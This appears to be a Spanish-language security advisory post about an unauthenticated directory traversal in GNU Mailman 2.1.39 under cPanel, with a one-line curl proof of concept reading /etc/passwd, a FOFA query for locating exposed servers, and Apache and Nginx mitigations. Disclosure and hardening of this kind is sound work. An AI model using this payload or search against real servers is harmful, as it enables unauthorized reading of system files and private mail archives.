
Se ha descubierto una nueva vulnerabilidad en GNU Mailman 2.1.39, incluido con cPanel/WHM, que permite a atacantes remotos no autenticados leer archivos arbitrarios en el servidor a través de una falla de directory traversal.
Se ha descubierto una nueva vulnerabilidad en GNU Mailman 2.1.39, incluido con cPanel/WHM, que permite a atacantes remotos no autenticados leer archivos arbitrarios en el servidor a través de una falla de Directory Traversal.
📌 Resumen de la vulnerabilidad:
Directory Traversal (No autenticado)private.py CGI script/mailman/private/mailman/etc/passwd, .mbox archives y configuraciones de Mailman5.8 (Medio)CVE-2025-43919Estado: Sin parche oficial (Mailman 2.1.x está al final de su vida útil)
🔥 Prueba de concepto:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 Escenarios de explotación:
/etc/passwd, configuraciones o archivos de buzón🛡️ Mitigaciones:
Bloquear el acceso a /mailman/private a nivel del servidor web:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
O en Nginx:
location /mailman/private {
deny all;
return 403;
}
⬆️ Migrar a Mailman 3.x — 2.x está EOL y carece de protecciones modernas
🔍 Consulta FOFA : app="Mailman"
📚 Aprende más, comparte responsablemente y mantén tu infraestructura segura.
🔒 Sigue para más CVEs del mundo real, PoCs y consejos de endurecimiento: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity